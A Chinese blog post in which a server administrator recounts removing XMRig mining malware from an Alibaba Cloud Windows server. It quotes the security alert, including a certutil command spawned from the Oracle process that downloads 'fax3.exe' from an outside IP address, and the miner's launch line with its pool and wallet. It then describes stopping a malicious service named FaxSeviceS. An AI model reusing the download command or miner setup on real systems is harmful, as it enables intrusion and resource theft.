阿里云服务器中招挖矿病毒XMrig miner解决方法

今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划，确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面，发现XMrig miner.exe cpu进程占用高达80%以上，cpu总占用达到99%，查了下时间是昨天十点开始进程占用率奇高的，因此我知道头痛的事情又来了：挖矿病毒又回来了。。。

查了一下告警信息，如下：

该告警由如下引擎检测发现：
执行命令的进程：xxxxx/oracle/product/11.2.1/db_1/database/System
恶意文件md5：1da0bf986119a583285499047edcd74a
进程id：9,332
描述：通常黑客入侵后会植入挖矿程序赚取收益，该类程序占用CPU等资源，影响用户正常业务，危害较大。且该程序可能还存在自删除行为，
或伪装成系统程序以躲避检测。如果发现该文件不存在，请检查是否存在可疑进程、定时任务或启动项。具体详情可查看帮助：

https://helpcdn.aliyun.com/knowledge_detail/41206.html

该告警由如下引擎检测发现：
父进程路径：xxxxx/oracle/product/11.2.1/db_1/BIN/oracle.exe
父进程命令行：xxxxx\oracle\product\11.2.1\db_1\bin\ORACLE.EXE ORCL
父进程id：1384
进程id：11736
URL链接：http://120.167.68.2:807/fax3.exe
进程路径：C:/Windows/SysWOW64/cmd.exe
命令行参数：cmd /c certutil.exe -urlcache -split -f http://60.12.77.171:807/fax3.exe

明显是通过 oracle 的进程从官网上下载程序，安装并植入。

采取步骤

1. 先备份所有必须的文件
2. 杀掉任务管理器的XMrig miner.exe进程
3. 查看Window 日志管理器

尝试1 任务管理器，强制关闭进程。
【结果】没用

尝试2 搜索windows如何终止可启动的进程

发现系统的调度程序会自动启动该程序

【结果】没用

尝试3 结合日志管理器 【解决】
发现只要终止进程，就会在日志管理器上产生一个日志

Started C:\oracle\product\11.2.1\db_1\DATABASE\System -a cn/r -o 
stratum+tcp://pool.supportxmr.com:5555 -u 47BoNDRZPB9VZ6fHZvHJUvFGV7J76d6zxPAP9Z5K879EKMLD4cecEnKJsH2FHBwgZwaFahLPKCaBtPcCEt4wmePo2VwXKgy -p xin
 --donate-level 1 for service FaxSeviceS in C:\oracle\product\11.2.1\db_1\DATABASE.

pool.supportxmr.com:5555

C:\oracle\product\11.2.1\db_1\DATABASE\Process.exe

重点就是“ service FaxSeviceS ” 这个是服务的名字！
那么，在服务窗口，停止服务，
接下来，终止进程
再后来，删除可疑文件

问题【解决】

但是并不知道重启服务器还会不会有，因为我的oracle进程会一直运行的，希望有其他人能给出更好的解决方案。